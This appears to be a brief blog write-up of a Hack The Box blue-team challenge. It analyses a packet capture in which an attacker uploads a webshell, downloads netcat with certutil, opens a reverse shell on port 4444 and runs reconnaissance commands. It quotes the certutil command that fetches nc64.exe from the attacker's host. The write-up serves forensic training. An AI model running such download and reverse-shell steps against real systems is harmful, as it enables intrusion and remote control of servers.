HTB: Intro to Blue Team: Chase

Michael Koczwara
3 min readSep 27, 2021

Description

One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?

Attack Analysis

22.22.22.7 is an attacker and 22.22.22.5 is the webserver

Filtering for HTTP traffic to make it clear.

HTTP Traffic

First GET HTTP Requests and Responses from webserver 22.22.22.5

An attacker uploaded a webshell first (authKey=admin).

An attacker executed a command line and downloaded netcat via certutil.

certutil -urlcache -split -f http://22.22.22.7/nc64.exe

Now we can see netcat running on the webserver connecting back to an attacker machine over port 4444

An attacker executed whoami, ipconfig commands on the webserver.

--

--